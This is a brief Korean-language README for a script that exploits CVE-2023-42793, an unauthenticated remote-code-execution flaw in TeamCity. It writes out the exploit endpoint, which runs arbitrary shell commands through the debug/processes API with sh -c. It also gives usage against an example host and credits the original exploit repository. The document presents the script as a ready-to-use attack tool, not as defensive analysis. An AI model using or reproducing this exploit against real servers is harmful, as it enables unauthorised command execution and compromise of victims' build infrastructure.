
teamcity-exploit-cve-2023-42793
cve-2023-42793 버그를 익스플로잇하는 빠른 스크립트입니다. 익스플로잇에 대한 추가 자료는 여기에서 찾을 수 있습니다:
https://www.cnblogs.com/LittleHann/p/17843271.html
이 스크립트는 RCE 버그를 트리거한 후 'params'를 자유롭게 사용하여 명령을 실행할 수 있는 기능을 추가합니다:
RCE_ENDPOINT="${BASE_URL}:${PORT}/app/rest/debug/processes?exePath=sh¶ms=-c¶ms=${URLCMD}"
Usage: <base_url> <port> <command>
./TeamCity.sh blah.com 8111 "ls -lah"
원본 스크립트는 여기에 있으며, 모든 크레딧은 해당 작성자에게 있습니다: https://github.com/Zenmovie/CVE-2023-42793